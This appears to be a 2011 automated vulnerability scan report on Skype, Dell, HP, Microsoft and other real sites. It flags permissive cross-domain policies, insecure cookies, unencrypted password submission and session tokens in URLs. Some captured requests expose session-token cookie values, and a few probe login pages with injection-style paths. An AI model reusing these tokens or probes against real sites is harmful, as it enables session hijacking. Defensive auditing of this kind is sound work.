GET /crossdomain.xml HTTP/1.0 Host: disqus.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:09:38 GMT Server: Apache Vary: Cookie,Accept-Encoding p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM" Connection: close Content-Type: text/x-cross-domain-policy
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: embed.technorati.com
Response
HTTP/1.1 200 OK Date: Mon, 05 Sep 2011 05:29:04 GMT Server: Apache Last-Modified: Thu, 29 Oct 2009 01:09:39 GMT ETag: "1d5c40-14f-4770890c33ac0" Accept-Ranges: bytes Content-Length: 335 Content-Type: text/xml Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: h30415.www3.hp.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: h30507.www3.hp.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: h41131.www4.hp.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: i.dell.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 24 Jun 2010 19:18:24 GMT ETag: "040eb3d213cb1:0" Date: Sun, 04 Sep 2011 16:19:15 GMT Content-Length: 1152 Connection: close Cache-Control: public, max-age=604800
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: lt.dell.com
Response
HTTP/1.1 200 OK Content-Length: 942 Content-Type: text/xml Last-Modified: Thu, 18 Feb 2010 21:01:46 GMT Accept-Ranges: bytes ETag: "bf15fe94ddb0ca1:ed9" X-Powered-By: ASP.NET Server: Unauthorized-Use-Prohibited Date: Sun, 04 Sep 2011 16:18:55 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: secure.skypeassets.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT ETag: "1a2-4929031207800" Content-Type: application/xml Content-Language: en Date: Sun, 04 Sep 2011 18:08:47 GMT Content-Length: 418 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: share.skype.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:04:06 GMT Server: Apache/2.2.0 (Fedora) Last-Modified: Mon, 04 May 2009 11:41:38 GMT ETag: "3d9466-173-46914a5288080" Accept-Ranges: bytes Content-Length: 371 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: shop.skype.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:08:58 GMT Server: Apache Last-Modified: Mon, 15 Feb 2010 12:48:02 GMT ETag: "36eca8-17c-47fa307142480" Accept-Ranges: bytes Content-Length: 380 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www-cdn.dell.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Fri, 27 Jun 2008 14:53:19 GMT ETag: "80997c8965d8c81:0" P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI " Date: Sun, 04 Sep 2011 16:19:07 GMT Content-Length: 370 Connection: close Cache-Control: max-age=0
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.radware.com
Response
HTTP/1.1 200 OK Content-Length: 452 Content-Type: text/xml Last-Modified: Thu, 16 Jun 2011 20:46:30 GMT Accept-Ranges: bytes ETag: "3c6a478662ccc1:417" X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 16:18:50 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.skype.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 17:59:14 GMT Server: Apache Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT ETag: "94c00f-1a2-4929031207800" Accept-Ranges: bytes Content-Length: 418 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: application/xml Content-Language: en
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.skypeassets.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT ETag: "1a2-4929031207800" Content-Type: application/xml Content-Language: en Cache-Control: max-age=10800 Date: Sun, 04 Sep 2011 21:04:12 GMT Content-Length: 418 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.typepad.com
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: cymphonix.app3.hubspot.com
Response
HTTP/1.1 200 OK Content-Length: 206 Content-Type: text/xml Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT Accept-Ranges: bytes ETag: "0e4f34a711c81:111b2" Server: Microsoft-IIS/6.0 P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR" X-Powered-By: ASP.NET Date: Sun, 04 Sep 2011 16:19:28 GMT Connection: close
<?xml version="1.0" ?> <!DOCTYPE cross-domain-policy (View Source for full doctype...)> - <cross-domain-policy> <allow-access-from domain="www.bluemedia.com" secure="true" /> </cross-domain-p ...[SNIP]...
5. Silverlight cross-domain policypreviousnext There are 8 instances of this issue:
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: met1.hp.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 16:19:48 GMT Server: Omniture DC/2.0.0 xserver: www385 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: metrics.skype.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 17:59:13 GMT Server: Omniture DC/2.0.0 xserver: www285 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: microsoftsto.112.2o7.net
Response
HTTP/1.1 200 OK Date: Mon, 05 Sep 2011 02:23:14 GMT Server: Omniture DC/2.0.0 xserver: www372 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: nsm.dell.com
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 16:19:16 GMT Server: Omniture DC/2.0.0 xserver: www111 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: pixel.33across.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: pixel.quantserve.com
The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: js.microsoft.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 12 May 2009 23:10:10 GMT ETag: "c4640cc56d3c91:0" Server: Microsoft-IIS/7.5 VTag: 438904743200000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Cache-Control: max-age=900 Date: Mon, 05 Sep 2011 02:23:13 GMT Content-Length: 572 Connection: close
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: msdn.microsoft.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Mon, 05 Sep 2011 02:23:10 GMT Connection: keep-alive Content-Length: 1456
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0 Host: login.skype.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824 Host: support.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /um/StartNewLogin HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824 Host: developer.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accessories HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /camera/skype-uvc-extension-unit-specification HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification/accessories HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification/certified-list HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /certification/odm-program HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /public/skypekit HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /public/skypekit/ HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /silk HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /skypekit HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support/ HTTP/1.1 Host: developer.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
lang=en-us; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subchoice/country/us/en/subhub.aspx HTTP/1.1 Host: h30046.www3.hp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /account/signup-form?setlang=en&intsrc=client%7Creg-a%7C0%2F5.5.0.114 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3 Host: login.skype.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.headsets HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.phones HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.accessories.webcams HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/shop.extras HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/skype.manager.setup HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /go/tvwebcams HTTP/1.1 Host: login.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /si/login.aspx/x22 HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2491 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:27 GMT Connection: close
<html> <head> <title>Windows Live ID</title> <meta name="MobileOptimized" content="100"/> <link type="text/css" rel="stylesheet" href="/hig.css"/> </head> <body> <form id="EmailPasswordForm" na ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2560 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:29 GMT Connection: close
<html> <head> <title>Windows Live ID</title> <meta name="MobileOptimized" content="100"/> <link type="text/css" rel="stylesheet" href="/hig.css"/> </head> <body> <form id="EmailPasswordForm" na ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login HTTP/1.1 Host: secure.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /en/2010/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:41:35 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 437288 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
